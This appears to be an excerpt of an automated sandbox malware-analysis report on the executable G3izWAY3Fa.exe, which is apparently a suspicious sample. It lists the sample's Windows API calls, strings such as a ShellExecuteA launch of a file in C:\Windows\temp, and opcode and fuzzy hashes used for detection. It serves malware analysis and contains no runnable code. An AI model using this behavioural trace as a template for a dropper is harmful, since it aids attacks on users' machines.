                                Control-flow Graph: entry block 004065de (rendered graph and edge list not recoverable in this export); the graph's blocks call GlobalAlloc and GlobalFree.
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: same ten dump regions (0x400000 through 0x47E000) as listed for the first function above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b486484d64dd4cde6c37fee08c13c94b86683911648eeb5affe32ba80e56590e
                                • Instruction ID: 736e54d1ea8bc2ffbcc58a3ee687e8f06aed80bce92bf0dad63538ea203c4f31
                                • Opcode Fuzzy Hash: b486484d64dd4cde6c37fee08c13c94b86683911648eeb5affe32ba80e56590e
                                • Instruction Fuzzy Hash: 77913271D00229CBDF28CF98C844BADBBB1FF44305F15816AD856BB281D7789A86DF54

                                Control-flow Graph: entry block 004062f4 (rendered graph and edge list not recoverable in this export); the graph's blocks call GlobalAlloc and GlobalFree.
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: same ten dump regions (0x400000 through 0x47E000) as listed for the first function above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a5c1a6d88fbf3736e083e35a306841f5f7567a3339756a66f66144e6d7487cc4
                                • Instruction ID: c975835c63a62796fcb7e955cfffcd5e326eaa1512836fcadbce1623bdfadb04
                                • Opcode Fuzzy Hash: a5c1a6d88fbf3736e083e35a306841f5f7567a3339756a66f66144e6d7487cc4
                                • Instruction Fuzzy Hash: AF816671D00229CFDF24CFA8C8447AEBBB1FB44305F25816AD856BB281C7789A86DF54

                                Control-flow Graph
                                [Control-flow graph rendering omitted: first listed block 405df9-405e1c, blocks span 405df9-40684a; API calls in graph: GlobalAlloc, GlobalFree]
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 797fef13bb3e8e171cff3cae9b41bd7abdeca14a353df9249488f574514014e3
                                • Instruction ID: 0ba87498709856dc17a0c5f751d6ecfe3ae25d7b1153355424f504aba8ac83cf
                                • Opcode Fuzzy Hash: 797fef13bb3e8e171cff3cae9b41bd7abdeca14a353df9249488f574514014e3
                                • Instruction Fuzzy Hash: B4817772D04229CBDF24CFA8C8447AEBBB0FB44305F25816AD856BB2C0D7785A86DF44

                                Control-flow Graph
                                [Control-flow graph rendering omitted: first listed block 406247-40624b, blocks span 405e3b-40684a; API calls in graph: GlobalAlloc, GlobalFree]
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab0e96aa9de7783a5fbfa8537471c17f47562fab6ccc56c1d015952012775d3a
                                • Instruction ID: 47c5cb8fc101d284839cddc633a7ca9263ac2e2456f843b1234a04abf02d33d1
                                • Opcode Fuzzy Hash: ab0e96aa9de7783a5fbfa8537471c17f47562fab6ccc56c1d015952012775d3a
                                • Instruction Fuzzy Hash: 0C713371D00229CBDF28CFA8C844BADBBF1FB44305F15806AD816BB281D7785A86DF54

                                Control-flow Graph
                                [Control-flow graph rendering omitted: first listed block 406365-406369, blocks span 405e3b-40684a; API calls in graph: GlobalAlloc, GlobalFree]
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 204a14aa4723f8bacec733d7555320540fe203445ac57d520a52ca53e11fdb0c
                                • Instruction ID: aa40489b15165fca9e2d73c9723ecf3d5b4a768092768a0400057c9dc9ec6b69
                                • Opcode Fuzzy Hash: 204a14aa4723f8bacec733d7555320540fe203445ac57d520a52ca53e11fdb0c
                                • Instruction Fuzzy Hash: F6714471D04229CFDF28CF98C844BAEBBB1FB44305F25816AD816BB281D7785A86DF54
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be6e9d30e93fbb49eb3c361b8f1c94b7932ac8d56391751c3e2361f0828e0a06
                                • Instruction ID: f7c6f07f586ed293a1c67bf574783cb577a0acbc2814a7f5ecfd539a56c9ebac
                                • Opcode Fuzzy Hash: be6e9d30e93fbb49eb3c361b8f1c94b7932ac8d56391751c3e2361f0828e0a06
                                • Instruction Fuzzy Hash: AF715671D00229CBDF28CF98C844BADBBB1FF44305F15816AD816BB281C7785A46DF54
                                APIs
                                • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Windows\temp,?), ref: 00401E07
                                Strings
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: C:\Windows\temp
                                • API String ID: 587946157-823764690
                                • Opcode ID: 92d2050c37f50ba05e813603419f61aaf560cdca42c4badea36c2296db382889
                                • Instruction ID: e1c53a3b58ef05eba024da23075f8ab054487d32240d7e587a4224b468346741
                                • Opcode Fuzzy Hash: 92d2050c37f50ba05e813603419f61aaf560cdca42c4badea36c2296db382889
                                • Instruction Fuzzy Hash: 87F0C872B04201AAC7516FB59D4AA5E2AA8AB41398F200637F510F61C1D9BD8841A658
                                APIs
                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
                                • Instruction ID: 9357c62ddf9e7b3c824d0b87f8e4bad160879ee2cb8093492041203a2cf1b2c1
                                • Opcode Fuzzy Hash: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
                                • Instruction Fuzzy Hash: A301F431724210ABE7295B389D04B2A36ADF710355F10427BF855F66F1D67CDC028B4D
                                APIs
                                • GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 004056B8
                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056DA
                                Similarity
                                • API ID: File$AttributesCreate
                                • String ID:
                                • API String ID: 415043291-0
                                • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                APIs
                                • GetFileAttributesA.KERNELBASE(?,004054A0,?,?,?), ref: 00405699
                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 004056AB
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                • Instruction ID: 6114cdacef20a61ffb1e354697c2a54f95ff97830a0005cd613603337fba2c3c
                                • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                • Instruction Fuzzy Hash: 72C04CB1808501BBD6015B24DF0D81F7B66EB51321B508F35F56DE00F1C7355CA6DA1A
                                APIs
                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EA7,000000FF,00000004,00000000,00000000,00000000), ref: 00403065
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                • Instruction ID: cf04fcf122da41e7499d2f74f705547a68887b1f6d4f421339b8fb166199a16f
                                • Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                • Instruction Fuzzy Hash: 2AE08C32901118BBCF205E619C00EAB3B5CEB053A2F00C032FA14E52A0D630EA11DBAA
                                APIs
                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DE9,?), ref: 0040308E
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
                                • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
                                APIs
                                • CloseHandle.KERNEL32(FFFFFFFF,004032BC,00000000), ref: 00403457
                                Similarity
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                • Opcode ID: cd01773061dc76ed6dc42017c9b80e515b0b69eef6637a25064d86b5b90a4b84
                                • Instruction ID: 2202cf36b8f848177cc2ffd66234e305818bf21466fa1b02f98de814e748bada
                                • Opcode Fuzzy Hash: cd01773061dc76ed6dc42017c9b80e515b0b69eef6637a25064d86b5b90a4b84
                                • Instruction Fuzzy Hash: E5C0123060470096D6206F799E4F5063A18574073AB904326F1B5B40F2C77C5901893F
                                APIs
                                • GetDlgItem.USER32(?,00000403), ref: 00404F18
                                • GetDlgItem.USER32(?,000003EE), ref: 00404F27
                                • GetClientRect.USER32(?,?), ref: 00404F64
                                • GetSystemMetrics.USER32(00000015), ref: 00404F6C
                                • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F8D
                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F9E
                                • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404FB1
                                • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FBF
                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FD2
                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404FF4
                                • ShowWindow.USER32(?,00000008), ref: 00405008
                                • GetDlgItem.USER32(?,000003EC), ref: 00405029
                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405039
                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405052
                                • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040505E
                                • GetDlgItem.USER32(?,000003F8), ref: 00404F36
                                  • Part of subcall function 00403DC4: SendMessageA.USER32(00000028,?,00000001,00403BF5), ref: 00403DD2
                                • GetDlgItem.USER32(?,000003EC), ref: 0040507B
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004E4D,00000000), ref: 00405089
                                • CloseHandle.KERNEL32(00000000), ref: 00405090
                                • ShowWindow.USER32(00000000), ref: 004050B4
                                • ShowWindow.USER32(?,00000008), ref: 004050B9
                                • ShowWindow.USER32(00000008), ref: 00405100
                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405132
                                • CreatePopupMenu.USER32 ref: 00405143
                                • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405158
                                • GetWindowRect.USER32(?,?), ref: 0040516B
                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040518F
                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051CA
                                • OpenClipboard.USER32(00000000), ref: 004051DA
                                • EmptyClipboard.USER32 ref: 004051E0
                                • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051E9
                                • GlobalLock.KERNEL32(00000000), ref: 004051F3
                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405207
                                • GlobalUnlock.KERNEL32(00000000), ref: 0040521F
                                • SetClipboardData.USER32(00000001,00000000), ref: 0040522A
                                • CloseClipboard.USER32 ref: 00405230
                                Strings
                                Similarity
                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                • String ID: {
                                • API String ID: 590372296-366298937
                                • Opcode ID: 001334b4ba3c222cf79d50ec4f04ffad4c31a43647bbcf3abe0fe5947dea7136
                                • Instruction ID: d8c2bf4a41f8d47596d7e212a196e63f96e24a60825c263716f9721a4c55cacb
                                • Opcode Fuzzy Hash: 001334b4ba3c222cf79d50ec4f04ffad4c31a43647bbcf3abe0fe5947dea7136
                                • Instruction Fuzzy Hash: 99A13A71900208BFDB219F60DD89EAE7F79FB04355F00817AFA04BA2A0C7799A51DF59
                                APIs
                                • GetDlgItem.USER32(?,000003F9), ref: 004046E1
                                • GetDlgItem.USER32(?,00000408), ref: 004046EE
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 0040473A
                                • LoadBitmapA.USER32(0000006E), ref: 0040474D
                                • SetWindowLongA.USER32(?,000000FC,00404CCB), ref: 00404767
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040477B
                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 0040478F
                                • SendMessageA.USER32(?,00001109,00000002), ref: 004047A4
                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004047B0
                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004047C2
                                • DeleteObject.GDI32(?), ref: 004047C7
                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047F2
                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047FE
                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404893
                                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004048BE
                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048D2
                                • GetWindowLongA.USER32(?,000000F0), ref: 00404901
                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 0040490F
                                • ShowWindow.USER32(?,00000005), ref: 00404920
                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404A23
                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A88
                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A9D
                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404AC1
                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404AE7
                                • ImageList_Destroy.COMCTL32(?), ref: 00404AFC
                                • GlobalFree.KERNEL32(?), ref: 00404B0C
                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B7C
                                • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404C25
                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C34
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C54
                                • ShowWindow.USER32(?,00000000), ref: 00404CA2
                                • GetDlgItem.USER32(?,000003FE), ref: 00404CAD
                                • ShowWindow.USER32(00000000), ref: 00404CB4
                                Strings
                                Similarity
                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                • String ID: $M$N
                                • API String ID: 1638840714-813528018
                                • Opcode ID: 2218f254bd768403f12b45b221eec84538c1d5bde26f6f708cdc4201c9d318c0
                                • Instruction ID: 1ebc4e1f5dd1db854d7f91ec63dfd1d34711f9484ded547680f267f962745bc2
                                • Opcode Fuzzy Hash: 2218f254bd768403f12b45b221eec84538c1d5bde26f6f708cdc4201c9d318c0
                                • Instruction Fuzzy Hash: 0802ADB0A00208EFDB20DF65DC45AAE7BB5FB84315F10817AF610BA2E1D7799A41CF58
                                APIs
                                • GetDlgItem.USER32(?,000003FB), ref: 00404219
                                • SetWindowTextA.USER32(?,?), ref: 00404246
                                • SHBrowseForFolderA.SHELL32(?,0041F848,?), ref: 004042FB
                                • CoTaskMemFree.OLE32(00000000), ref: 00404306
                                • lstrcmpiA.KERNEL32(open C:\Windows\temp\Edit9,00420478), ref: 00404338
                                • lstrcatA.KERNEL32(?,open C:\Windows\temp\Edit9), ref: 00404344
                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404354
                                  • Part of subcall function 00405282: GetDlgItemTextA.USER32(?,?,00000400,00404387), ref: 00405295
                                  • Part of subcall function 00405C3F: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                  • Part of subcall function 00405C3F: CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                  • Part of subcall function 00405C3F: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                  • Part of subcall function 00405C3F: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                • GetDiskFreeSpaceA.KERNEL32(0041F440,?,?,0000040F,?,0041F440,0041F440,?,00000000,0041F440,?,?,000003FB,?), ref: 0040440D
                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404428
                                • SetDlgItemTextA.USER32(00000000,00000400,0041F430), ref: 004044A1
                                Strings
                                Similarity
                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                • String ID: A$C:\Windows\temp$open C:\Windows\temp\Edit9
                                • API String ID: 2246997448-1475063729
                                • Opcode ID: 6e673fc6d151b24e91dad944200417fa3a5a6dedc4a92dfa1b187ab04de59240
                                • Instruction ID: b374e158efdd7287bf49babe660ec8015a33fdd664c905072b33ae798ddb7db4
                                • Opcode Fuzzy Hash: 6e673fc6d151b24e91dad944200417fa3a5a6dedc4a92dfa1b187ab04de59240
                                • Instruction Fuzzy Hash: 4C9175B1A00219ABDF11AFA1CC84AAF7AB8EF44354F10407BFA04B62D1D77C9A41DB59
                                APIs
                                • DeleteFileA.KERNEL32(?,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 00405320
                                • lstrcatA.KERNEL32(00421480,\*.*,00421480,?,00000000,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 0040536A
                                • lstrcatA.KERNEL32(?,00409010,?,00421480,?,00000000,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 0040538B
                                • lstrlenA.KERNEL32(?,?,00409010,?,00421480,?,00000000,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 00405391
                                • FindFirstFileA.KERNEL32(00421480,?,?,?,00409010,?,00421480,?,00000000,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 004053A2
                                • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405454
                                • FindClose.KERNEL32(?), ref: 00405465
                                Strings
                                • "C:\Users\user\Desktop\G3izWAY3Fa.exe", xrefs: 0040530C
                                • \*.*, xrefs: 00405364
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405302
                                Similarity
                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                • String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                • API String ID: 2035342205-2680054973
                                • Opcode ID: ab34e0f4a398502fe4f841fd0ab2e19b6a8460b2f5b0e4388ce4a397f92dccb8
                                • Instruction ID: 4b200e60d3e8d58e0ab6cbb93b3ca9934a2dcfa31e3b076817fab6d13423d761
                                • Opcode Fuzzy Hash: ab34e0f4a398502fe4f841fd0ab2e19b6a8460b2f5b0e4388ce4a397f92dccb8
                                • Instruction Fuzzy Hash: 45511230844A48B6DB226B228C45BFF3A78DF4275AF14813BF845751D1C77C4981DE6E
                                APIs
                                • GetVersion.KERNEL32(?,0041FC50,00000000,00404DB3,0041FC50,00000000), ref: 00405AA7
                                • GetSystemDirectoryA.KERNEL32(open C:\Windows\temp\Edit9,00000400), ref: 00405B22
                                • GetWindowsDirectoryA.KERNEL32(open C:\Windows\temp\Edit9,00000400), ref: 00405B35
                                • SHGetSpecialFolderLocation.SHELL32(?,0040F020), ref: 00405B71
                                • SHGetPathFromIDListA.SHELL32(0040F020,open C:\Windows\temp\Edit9), ref: 00405B7F
                                • CoTaskMemFree.OLE32(0040F020), ref: 00405B8A
                                • lstrcatA.KERNEL32(open C:\Windows\temp\Edit9,\Microsoft\Internet Explorer\Quick Launch), ref: 00405BAC
                                • lstrlenA.KERNEL32(open C:\Windows\temp\Edit9,?,0041FC50,00000000,00404DB3,0041FC50,00000000), ref: 00405BFE
                                Strings
                                Similarity
                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$open C:\Windows\temp\Edit9
                                • API String ID: 900638850-3049956873
                                • Opcode ID: 4882c5000ece73840c27ef34f72b9de924b5e58c0caf7ba4a0b851a4f11f77ef
                                • Instruction ID: d3edd175ae4d098aa1e1d30cbcff8d3f456ad99068bf2b680a9da6a8a672f2a4
                                • Opcode Fuzzy Hash: 4882c5000ece73840c27ef34f72b9de924b5e58c0caf7ba4a0b851a4f11f77ef
                                • Instruction Fuzzy Hash: 30511471A04A04ABEB215F68DC84B7F3BB4EB55324F14423BE911B62D1D27C6981DF4E
                                APIs
                                • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409348,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                Strings
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID: C:\Windows\temp
                                • API String ID: 123533781-823764690
                                • Opcode ID: 2dd538ee9b8a3d7f9f3516468ec66178ea648c363e8e90f8139c66e2dda502c8
                                • Instruction ID: ce0b4858a9f81ea3ddc308d80d774a06bef6b406c5dcff46aa6a4b0d76e862c7
                                • Opcode Fuzzy Hash: 2dd538ee9b8a3d7f9f3516468ec66178ea648c363e8e90f8139c66e2dda502c8
                                • Instruction Fuzzy Hash: AE418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                APIs
                                • FindFirstFileA.KERNEL32(?,004224C8,00421880,004055F4,00421880,00421880,00000000,00421880,00421880,?,?,00000000,00405316,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 00405CE3
                                • FindClose.KERNEL32(00000000), ref: 00405CEF
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID:
                                • API String ID: 2295610775-0
                                • Opcode ID: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
                                • Instruction ID: 9a18407f5d3c0b203e51d924b64f4f6f4a008a27543408caa796c3d3b713bef8
                                • Opcode Fuzzy Hash: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
                                • Instruction Fuzzy Hash: 91D0C93594D620ABD6012728AD0884B6A589B153317508B32F46AE22E0C7748C529AA9
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
                                Similarity
                                • API ID: FileFindFirst
                                • String ID:
                                • API String ID: 1974802433-0
                                • Opcode ID: f3d53191a6114d87a635ba583fb771baa2153c083736da5485a901926fc49706
                                • Instruction ID: 14dcf34609860af9969e045d3f077fc7a18bb2554c958aa599433bfc977b1d94
                                • Opcode Fuzzy Hash: f3d53191a6114d87a635ba583fb771baa2153c083736da5485a901926fc49706
                                • Instruction Fuzzy Hash: 86F0E572A04101DFD700EBB49E49AEEB778DF51328FA0067BF101F20C1D2B84A45DB2A
                                APIs
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038F8
                                • ShowWindow.USER32(?), ref: 00403915
                                • DestroyWindow.USER32 ref: 00403929
                                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403945
                                • GetDlgItem.USER32(?,?), ref: 00403966
                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 0040397A
                                • IsWindowEnabled.USER32(00000000), ref: 00403981
                                • GetDlgItem.USER32(?,00000001), ref: 00403A2F
                                • GetDlgItem.USER32(?,00000002), ref: 00403A39
                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403A53
                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403AA4
                                • GetDlgItem.USER32(?,00000003), ref: 00403B4A
                                • ShowWindow.USER32(00000000,?), ref: 00403B6B
                                • EnableWindow.USER32(?,?), ref: 00403B7D
                                • EnableWindow.USER32(?,?), ref: 00403B98
                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403BAE
                                • EnableMenuItem.USER32(00000000), ref: 00403BB5
                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403BCD
                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BE0
                                • lstrlenA.KERNEL32(00420478,?,00420478,00423680), ref: 00403C09
                                • SetWindowTextA.USER32(?,00420478), ref: 00403C18
                                • ShowWindow.USER32(?,0000000A), ref: 00403D4C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                • String ID:
                                • API String ID: 184305955-0
                                • Opcode ID: d8b962e911b7c253e61e73d21e88cb3add85ad3b5a8fe6332aee3bd0e594c397
                                • Instruction ID: 874aaf0cc80a4ada72e8b6aceb9d73cb056a569e4b675a7f159d56e4bf17f1bf
                                • Opcode Fuzzy Hash: d8b962e911b7c253e61e73d21e88cb3add85ad3b5a8fe6332aee3bd0e594c397
                                • Instruction Fuzzy Hash: F9C18E71A04204BBDB206F21ED85E2B3E7CEB05746F40453EF641B52F1C779AA429B2E
                                APIs
                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F62
                                • GetDlgItem.USER32(00000000,000003E8), ref: 00403F76
                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403F94
                                • GetSysColor.USER32(?), ref: 00403FA5
                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FB4
                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FC3
                                • lstrlenA.KERNEL32(?), ref: 00403FCD
                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FDB
                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403FEA
                                • GetDlgItem.USER32(?,0000040A), ref: 0040404D
                                • SendMessageA.USER32(00000000), ref: 00404050
                                • GetDlgItem.USER32(?,000003E8), ref: 0040407B
                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040BB
                                • LoadCursorA.USER32(00000000,00007F02), ref: 004040CA
                                • SetCursor.USER32(00000000), ref: 004040D3
                                • ShellExecuteA.SHELL32(0000070B,open, .B,00000000,00000000,00000001), ref: 004040E6
                                • LoadCursorA.USER32(00000000,00007F00), ref: 004040F3
                                • SetCursor.USER32(00000000), ref: 004040F6
                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404122
                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404136
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
